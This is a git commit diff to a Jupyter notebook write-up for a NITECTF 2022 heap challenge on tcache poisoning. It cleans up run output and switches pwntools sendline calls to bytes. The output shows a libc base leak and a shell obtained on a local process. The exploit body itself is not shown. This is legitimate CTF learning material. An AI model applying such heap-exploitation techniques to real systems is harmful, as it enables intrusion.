chore: update heapchall

wongsingfo · Dec 26, 2022 · 5a1c5a2 · 5a1c5a2
1 parent e704ee5
commit 5a1c5a2
Showing 1 changed file with 9 additions and 27 deletions.
diff --git a/tcache-poisoning/README.ipynb b/tcache-poisoning/README.ipynb
@@ -57,7 +57,7 @@
     "\n",
     "Source: NITECTF 2022\n",
     "\n",
-    "Actions (`0<a<10`):\n",
+    "Actions:\n",
     "\n",
     "- `slot[a] = malloc(b)`, \n",
     "- `scanf(\"%s\", slot[a])`\n",
@@ -116,8 +116,6 @@
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "cp: cannot create regular file './heapchall.patch': Text file busy\n",
-      "patchelf: open: Text file busy\n",
       "[*] '/ctf/work/tcache-poisoning/heapchall.patch'\n",
       "    Arch:     amd64-64-little\n",
       "    RELRO:    Partial RELRO\n",
@@ -255,9 +253,9 @@
      "output_type": "stream",
      "text": [
       "[x] Starting local process './heapchall.patch'\n",
-      "[+] Starting local process './heapchall.patch': pid 60631\n",
-      "hex(libc_base)='0x7f66acbb7000'\n",
-      "0xe30,0xe30c90,0xe30d80,0xf0,0xe30be0,0xe308d0,0xe309c0,0x7f66acda9ce0,0x0\n",
+      "[+] Starting local process './heapchall.patch': pid 1514776\n",
+      "hex(libc_base)='0x7f1b0ad66000'\n",
+      "0xfae,0xfaed0e,0xfaec1e,0xfaeb6e,0xfaea7e,0xfae94e,0xfae85e,0xf58ce0,0x0\n",
       "[DEBUG] Sent 0xe bytes:\n",
       "    b'echo you win!\\n'\n",
       "[DEBUG] Sent 0x5 bytes:\n",
@@ -267,25 +265,9 @@
       "[DEBUG] Received 0x28 bytes:\n",
       "    b'Winner winner, chicken dinner!\\n'\n",
       "    b'you win!\\n'\n",
-      "[x] Receiving all data: 41B\n"
-     ]
-    },
-    {
-     "name": "stderr",
-     "output_type": "stream",
-     "text": [
-      "/tmp/ipykernel_40707/977483005.py:12: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes\n",
-      "  io.sendline('echo you win!')\n",
-      "/tmp/ipykernel_40707/977483005.py:13: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes\n",
-      "  io.sendline('exit')\n"
-     ]
-    },
-    {
-     "name": "stdout",
-     "output_type": "stream",
-     "text": [
+      "[x] Receiving all data: 41B\n",
       "[+] Receiving all data: Done (41B)\n",
-      "[*] Stopped process './heapchall.patch' (pid 60631)\n",
+      "[*] Stopped process './heapchall.patch' (pid 1514776)\n",
       "b' Winner winner, chicken dinner!\\nyou win!\\n'\n"
      ]
     }
@@ -302,9 +284,9 @@
     "try:\n",
     "    exploit(io)\n",
     "    with context.local(log_level='debug'):\n",
-    "        io.sendline('echo you win!')\n",
-    "        io.sendline('exit')\n",
-    "        print(io.recvall(timeout=1))\n",
+    "        io.sendline(b'echo you win!')\n",
+    "        io.sendline(b'exit')\n",
+    "        print(io.recvall(timeout=2))\n",
     "        io.kill()\n",
     "    io.poll(block=True)\n",
     "except Exception as e:\n",